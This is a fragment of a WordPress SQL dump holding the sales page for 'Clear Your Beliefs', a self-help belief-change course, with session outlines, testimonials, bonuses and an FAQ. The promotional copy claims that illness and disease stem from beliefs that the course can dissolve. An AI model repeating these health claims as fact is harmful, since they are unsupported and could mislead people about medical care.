src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n<h1>\r\nAbout Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 02:04:14', '2014-06-19 07:04:14', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1046, 2, '2014-06-19 02:02:22', '2014-06-19 07:02:22', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and 